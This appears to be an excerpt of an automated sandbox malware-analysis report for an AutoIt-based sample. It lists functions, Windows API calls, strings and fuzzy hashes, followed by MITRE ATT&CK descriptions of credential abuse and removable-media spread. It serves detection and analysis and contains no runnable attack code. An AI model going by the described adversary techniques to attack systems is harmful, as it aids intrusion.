Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: a4befd0db502248088ad97ec82988420b31eec34b0c688561cdc70e09282bf4b
Instruction ID: 44058076c401e8414b85cd87c8cf5f6f822217dc918f8f4643053aadbd2b1dc9
Opcode Fuzzy Hash: a4befd0db502248088ad97ec82988420b31eec34b0c688561cdc70e09282bf4b
Instruction Fuzzy Hash: CC119D71900208AFEB108E64DC50FFB7B69EB25374F118724FA65931E0C631DC569B74

Function 00DD5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DD5CF3
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00DD5D12

Strings

0, xrefs: 00DD5CEC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 7be9cf7e68e015b084f41100e074d38200af077cc64b2b3171bc889449643921
Instruction ID: a3bf6913bed8cf00766944e8bf6327c0545725ab07f89a5389d95f31f959392f
Opcode Fuzzy Hash: 7be9cf7e68e015b084f41100e074d38200af077cc64b2b3171bc889449643921
Instruction Fuzzy Hash: F7118B72911618ABDB24DA6CE848F9977EAAB06344F180022ED41EB298D370ED08C7B1

Function 00DE53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DE544C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DE5475

Strings

<local>, xrefs: 00DE543D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 3e7e64054155ffa9d0cfdf5f498fb2c4cf51e1a6347d2685ff512231c41e86c2
Instruction ID: dc8061db3935ec6fd9a732bac291ee70214abab74de4f353a29b91178be4932b
Opcode Fuzzy Hash: 3e7e64054155ffa9d0cfdf5f498fb2c4cf51e1a6347d2685ff512231c41e86c2
Instruction Fuzzy Hash: 6B110670541A61BADB15AF52AC84EFBFB68FF1279AF10812AF54592080E37099C0C6F0

Function 00DBB4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC4557
___raise_securityfailure.LIBCMT ref: 00DC463E

Strings

(, xrefs: 00DC4639

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (
API String ID: 3761405300-2982846942
Opcode ID: 4175b82d1852db89c7007cdca0e5c8787520fa08113c73ac9b6a81f4ac7455bd
Instruction ID: 5b5835fa23f0ce2a2bcf1f229bc2ba61633cbb05b04633dc630984c2d9fa8be0
Opcode Fuzzy Hash: 4175b82d1852db89c7007cdca0e5c8787520fa08113c73ac9b6a81f4ac7455bd
Instruction Fuzzy Hash: 042114B5510304DFDB09DF56E9967903BB0BB48326F245C2AF904AB3A0EBF06988CF45

Function 00DEACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000000), ref: 00DEACF5
htons.WS2_32(00000000), ref: 00DEAD32

Strings

255.255.255.255, xrefs: 00DEAD0D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: d164b2efbebb9bca582db8189cede5d5f598ccf5b538539b9081652042b12a10
Instruction ID: f6ebf01d5c65f72a1ebdbfd73a36b8c42eace9aaf35532541e354cc501fb38c1
Opcode Fuzzy Hash: d164b2efbebb9bca582db8189cede5d5f598ccf5b538539b9081652042b12a10
Instruction Fuzzy Hash: C4019275200246ABCB10AFA9DC46FADB365EF44724F10852AF5169B2D1E671F804C775

Function 00DCC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DCC5E5

Strings

ListBox, xrefs: 00DCC5AF
ComboBox, xrefs: 00DCC581

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 21017723ad87d97a8c521aa70ef805206cef9308be98256b00a12d5facea1432
Instruction ID: 40f9148d1cea40c66babc7d77cb455f531aa0ff76b6e0710eeb76537833b698e
Opcode Fuzzy Hash: 21017723ad87d97a8c521aa70ef805206cef9308be98256b00a12d5facea1432
Instruction Fuzzy Hash: EA01B171661219ABCB08EBA8CC52EFE7369EB42350B141B1DF562E72D1DA30A9089770

Function 00DDC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DDC4EF
__fread_nolock.LIBCMT ref: 00DDC504

Strings

EA06, xrefs: 00DDC532

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 102789da74984128455772a3565e655e8bfc71ed428547202abb087557487d44
Instruction ID: 33e50b78dffb2a2fbf45232537bac3bc0699b75856629cfc81727c9e7bfd223b
Opcode Fuzzy Hash: 102789da74984128455772a3565e655e8bfc71ed428547202abb087557487d44
Instruction Fuzzy Hash: E901F572900218BEDB28D7A8C816EFE7BF8DB05311F00419AE193D2281E5B4E708CB70

Function 00DCC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

SendMessageW.USER32(?,00000180,00000000,?), ref: 00DCC4E1

Strings

ListBox, xrefs: 00DCC4AB
ComboBox, xrefs: 00DCC47D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 868dc670220912e00398bfd1f4a87ceb47e3954201bd555a5d2a70a8b7f189b6
Instruction ID: a117220dfac7ddd4a377645b080ed113b0a8e98ff8ee5d4f36e0e5dfa57297f6
Opcode Fuzzy Hash: 868dc670220912e00398bfd1f4a87ceb47e3954201bd555a5d2a70a8b7f189b6
Instruction Fuzzy Hash: DD01DFB1651109ABCB08EBA0C962FFF73A8DB01301F14512DFA02F31C1EA10AE0893B1

Function 00DCC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

SendMessageW.USER32(?,00000182,?,00000000), ref: 00DCC562

Strings

ListBox, xrefs: 00DCC52E
ComboBox, xrefs: 00DCC500

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 8ad3deb9409edb23c75bb788261862b00eeb5331f64027195dbca3c04b81f90d
Instruction ID: 8ba5940f3c54b28ab887946a933e68d42d530442b9b32608e1cbe91fb0e669da
Opcode Fuzzy Hash: 8ad3deb9409edb23c75bb788261862b00eeb5331f64027195dbca3c04b81f90d
Instruction Fuzzy Hash: 8601D1B1A61109ABCB05EBA4C952FFF73ACDB01741F141129FA07F32C1DA54AE09A7B5

Function 00DD804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00DD806A
_wcscmp.LIBCMT ref: 00DD807C

Strings

#32770, xrefs: 00DD8076

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: ffbbfc2d67c7a462cafd06ed696e5fa035e214238ea0b2b5156e01131fe6d9be
Instruction ID: 9091954c90131c990bee8758ac9691344b71bddb3c6b03c98dfeb432be5498a6
Opcode Fuzzy Hash: ffbbfc2d67c7a462cafd06ed696e5fa035e214238ea0b2b5156e01131fe6d9be
Instruction Fuzzy Hash: 15E0D8376003296BD720EEA6AC0AFE7FBBCEB517A4F000027F924E3141D6709A4587E4

Function 00DBDA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__umatherr.LIBCMT ref: 00DBDA2A

Part of subcall function 00DBDD86: __ctrlfp.LIBCMT ref: 00DBDDE5

__ctrlfp.LIBCMT ref: 00DBDA47

Strings

xn, xrefs: 00DBDA3E, 00DBDA0F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __ctrlfp$__umatherr
String ID: xn
API String ID: 219961500-2689218296
Opcode ID: 6b8b7429e182eda4c6f82ccae526f686bacc248de0ea481439b942a8988d31d5
Instruction ID: 757d87c389656fa209f5af0e63a361eca90eff6f1f17b14d25fa18d6925db6ec
Opcode Fuzzy Hash: 6b8b7429e182eda4c6f82ccae526f686bacc248de0ea481439b942a8988d31d5
Instruction Fuzzy Hash: B5E06D7540860AEEDB017F80F8066E93BAAEF54320F804094F99C14096EFB284B8D777

Function 00DCB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DCB36B

Part of subcall function 00DB2011: _doexit.LIBCMT ref: 00DB201B

Strings

AutoIt, xrefs: 00DCB35F
Error allocating memory., xrefs: 00DCB364

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: b5e29509650961a208aed12a6acee3c6dd97a5973ef0568f9117aab0d6e5a6c4
Instruction ID: 3d7b22c5142eb52f7f18e80bce39fcb43137d423514498ddb483813a4b0c4b84
Opcode Fuzzy Hash: b5e29509650961a208aed12a6acee3c6dd97a5973ef0568f9117aab0d6e5a6c4
Instruction Fuzzy Hash: 78D0123228835872D21976997C07FD56A888F05B51F544016BF49A61C28AD6958042B9

Function 00E0BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00E0BAB8
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E0BCAB

Strings

WIN_XPe, xrefs: 00E0BACB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 0a1f24ff5fb07c5aabe3fa0667430839ebc799e76c12da6e9f15c81b4c21d3f6
Instruction ID: b7e9e7386eabb5f5cf0031ee6005589ca9acbfdbf4023d5428424b84d61810ba
Opcode Fuzzy Hash: 0a1f24ff5fb07c5aabe3fa0667430839ebc799e76c12da6e9f15c81b4c21d3f6
Instruction Fuzzy Hash: ADE0C970D0410DEFCB15DBAACC45AECB7B8BB08340F14D49AE122B20A1C7719A84DF31

Function 00DF84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF84DF
PostMessageW.USER32(00000000), ref: 00DF84E6

Part of subcall function 00DD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD83CD

Strings

Shell_TrayWnd, xrefs: 00DF84D8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: faefc9c6eff37b03a41161269a1156d439d12e730e48ad95d18d27816cf4a0ab
Instruction ID: d29c5d42cfe548f0f53ef899fe12c9cf052b835039286c502b635e802eb019a5
Opcode Fuzzy Hash: faefc9c6eff37b03a41161269a1156d439d12e730e48ad95d18d27816cf4a0ab
Instruction Fuzzy Hash: 60D0A9323883207BE622AB30AC0BFC66604AB18B10F00096A720ABA2C0C8E0B8048220

Function 00DF8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF849F
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DF84B2

Part of subcall function 00DD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD83CD

Strings

Shell_TrayWnd, xrefs: 00DF8498

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7bc23c78e2f1d2ae32a9727239299326c1068b921890bc7f3dc121a67320aeeb
Instruction ID: 41c91e43c4ece529da54391f32f2057e37d2dbd8b641ef85ffc52c4c9b3b57af
Opcode Fuzzy Hash: 7bc23c78e2f1d2ae32a9727239299326c1068b921890bc7f3dc121a67320aeeb
Instruction Fuzzy Hash: 3ED02232388320BBE721AB30AC0FFC76A04EB14B10F00096A730EBA2C0C8E0B804C330

Function 00DDD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00DDD01E
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00DDD035

Strings

aut, xrefs: 00DDD02F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a21b724c187d2fd244a616a40f9e8cd50b16a81e1b0733d897fc1b8adb2895da
Instruction ID: 3fd62d0a98982c0605d0598795e47e0bd1451e42463a2cc47e794b8124742496
Opcode Fuzzy Hash: a21b724c187d2fd244a616a40f9e8cd50b16a81e1b0733d897fc1b8adb2895da
Instruction Fuzzy Hash: 5BD05EB554430EBFDB10AFA0ED0EF99776CA704704F1081907724E10E1D3B4D649CBA0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
